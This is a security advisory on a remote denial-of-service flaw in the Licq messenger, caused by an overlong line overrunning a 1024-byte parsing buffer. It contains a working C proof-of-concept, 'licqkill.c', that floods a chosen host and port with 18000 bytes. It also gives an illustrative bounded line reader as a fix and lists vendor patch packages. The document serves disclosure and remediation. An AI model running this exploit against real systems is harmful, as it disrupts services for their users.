COMMAND
licq
SYSTEMS AFFECTED
licq v.85 and v1.0.2 and possibly previous or newer versions.
PROBLEM
Stanley G. Bubrouski found the following. While testing Licq back in
December it became apparent to Stan that Licq could be made to
crash consistently if a certain amount of data is sent to a port
it is listening on. Further testing showed that sending a certain
amount of data to the port the Remote Management Service (RMS)
plugin listens on would also cause Licq to crash or lock up.
The amount of data that has to be sent to crash Licq may vary from
system to system. On the Red Hat Linux 7.0 system he used, 16707
or more bytes sent to the port Licq was listening on was enough
to crash it. Sending around 12000 or more characters to the RMS
plugin port was enough to crash Licq on that system as well. Attached
is a simple exploit to demonstrate the DoS.
/*
 * Name: Licqkill.c
 * Author: Stan Bubrouski <stan@ccs.neu.edu>
 * Date: December 26, 2000
 * This has been tested against Licq v.85 and v1.0.2
 * Purpose: Proof-of-concept tool for the Licq Denial of Service vulnerability.
 */
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>      /* close() */

int main(int argc, char **argv)
{
    char buf[18000];
    int sock, result;
    struct sockaddr_in sin;
    struct hostent *hn;

    printf("licqkill.c - Licq remote DoS by Stan Bubrouski <stan@ccs.neu.edu>\n\n");
    if (argc < 3)
    {
        fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
        exit(-1);
    }
    hn = gethostbyname(argv[1]);
    if (!hn)
    {
        fprintf(stderr, "%s: host lookup failure\n", argv[1]);
        exit(-1);
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    memcpy(&sin.sin_addr, hn->h_addr_list[0], sizeof(sin.sin_addr));
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)    /* check the descriptor before handing it to connect() */
    {
        fprintf(stderr, "Socket error: %s\n", strerror(errno));
        exit(-1);
    }
    result = connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));
    if (result != 0)
    {
        fprintf(stderr, "Failed to establish connection to %s\n", argv[1]);
        exit(-1);
    }
    /* 18000 bytes of 'A' with no newline anywhere; memset() fills the
     * whole buffer in place without relying on it being zeroed first
     * and without appending past its end. */
    memset(buf, 'A', sizeof(buf));
    send(sock, buf, sizeof(buf), 0);
    close(sock);
    fprintf(stdout, "Data sent\n\n");
    return 0;
}
SOLUTION
The actual problem is due to line parsing code that uses a fixed-
length (dynamically allocated) buffer of 1024 bytes. Any string
of characters longer than 1024 bytes without a newline will crash the
server. This has been fixed in the latest CVS tree, which will be
released along with Licq 1.0.3 very soon.
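As an added illustration (not Licq's own parser or patch), this is the shape of a bounded line reader that closes the class of bug described above: the 1024-byte limit is kept, but a line that does not fit is truncated, drained and reported as LINE_TOO_LONG instead of overrunning the buffer. fmemopen() stands in for the socket, and LINE_BUF, read_line_bounded, first_line_status and the all-'A' probe payload are names and inputs constructed here.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define LINE_BUF 1024             /* the fixed buffer size named in the advisory */
enum { LINE_OK = 0, LINE_EOF = -1, LINE_TOO_LONG = -2 };

/* Bounded line reader: stores at most cap-1 bytes, always NUL-terminates,
 * and when a line does not fit it drains the rest of that line from the
 * stream and reports LINE_TOO_LONG instead of writing past the buffer. */
static int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    size_t n = 0;
    int c, overlong = 0;
    while ((c = fgetc(in)) != EOF && c != '\n') {
        if (n + 1 < cap)
            buf[n++] = (char)c;
        else
            overlong = 1;         /* excess bytes are discarded, not stored */
    }
    buf[n] = '\0';
    if (c == EOF && n == 0 && !overlong)
        return LINE_EOF;
    return overlong ? LINE_TOO_LONG : LINE_OK;
}

/* Parse an in-memory payload as the daemon would read it from the socket;
 * returns the status of its first line and leaves the kept text in `out`. */
static int first_line_status(const char *payload, size_t len, char *out)
{
    FILE *in = fmemopen((void *)payload, len, "r");
    int rc;
    if (!in) return LINE_EOF;
    rc = read_line_bounded(in, out, LINE_BUF);
    fclose(in);
    return rc;
}

/* Constructed input: `len` bytes of 'A' with no newline, the advisory's crash
 * condition. Returns the reader's status; *kept gets the bytes retained. */
static int probe_run_of_a(size_t len, size_t *kept)
{
    static char payload[20000];
    char line[LINE_BUF];
    int rc;
    if (len > sizeof payload) len = sizeof payload;
    memset(payload, 'A', len);
    rc = first_line_status(payload, len, line);
    if (kept) *kept = strlen(line);
    return rc;
}
```

A caller that treats LINE_TOO_LONG as a protocol error and closes the connection gets the same 1024-byte behaviour the original intended, minus the crash.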
For Mandrake Linux:
Linux-Mandrake 7.1:
7.1/RPMS/licq-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-autoreply-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-console-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-devel-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-forwarder-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-gtk-0.50.1-3.3mdk.i586.rpm
7.1/RPMS/licq-rms-1.0.3-2.2mdk.i586.rpm
7.1/RPMS/licq-update-hosts-1.0.3-2.2mdk.i586.rpm
7.1/SRPMS/licq-1.0.3-2.2mdk.src.rpm
7.1/SRPMS/licq-gtk-0.50.1-3.3mdk.src.rpm
Linux-Mandrake 7.2:
7.2/RPMS/licq-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-autoreply-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-console-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-devel-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-forwarder-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-rms-1.0.3-2.3mdk.i586.rpm
7.2/RPMS/licq-update-hosts-1.0.3-2.3mdk.i586.rpm
7.2/SRPMS/licq-1.0.3-2.3mdk.src.rpm
Corporate Server 1.0.1:
1.0.1/RPMS/licq-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-autoreply-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-console-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-devel-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-forwarder-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-gtk-0.50.1-3.3mdk.i586.rpm
1.0.1/RPMS/licq-rms-1.0.3-2.2mdk.i586.rpm
1.0.1/RPMS/licq-update-hosts-1.0.3-2.2mdk.i586.rpm
1.0.1/SRPMS/licq-1.0.3-2.2mdk.src.rpm
1.0.1/SRPMS/licq-gtk-0.50.1-3.3mdk.src.rpm
For Red Hat:
ftp://updates.redhat.com/7.0/SRPMS/licq-1.0.2-2.src.rpm
ftp://updates.redhat.com/7.0/alpha/licq-1.0.2-2.alpha.rpm
ftp://updates.redhat.com/7.0/i386/licq-1.0.2-2.i386.rpm
ftp://updates.redhat.com/powertools/6.2/SRPMS/licq-1.0.2-0.6x.1.src.rpm
ftp://updates.redhat.com/powertools/6.2/alpha/licq-1.0.2-0.6x.1.alpha.rpm
ftp://updates.redhat.com/powertools/6.2/i386/licq-1.0.2-0.6x.1.i386.rpm
ftp://updates.redhat.com/powertools/6.2/sparc/licq-1.0.2-0.6x.1.sparc.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/licq-0.61-7cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/licq-0.61-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/licq-0.75.2-10cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/licq-0.75.2-10cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/licq-1.0.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-common-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-devel-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-plugins-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-console-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/licq-qt-gui-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/licq-1.0.3-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-common-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-devel-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-plugins-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-console-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/licq-qt-gui-1.0.3-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/licq-0.75.2-10cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/licq-0.75.2-10cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/licq-0.75.2-10cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/licq-0.75.2-10cl.i386.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/licq-1.0.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/licq-1.0.3.tgz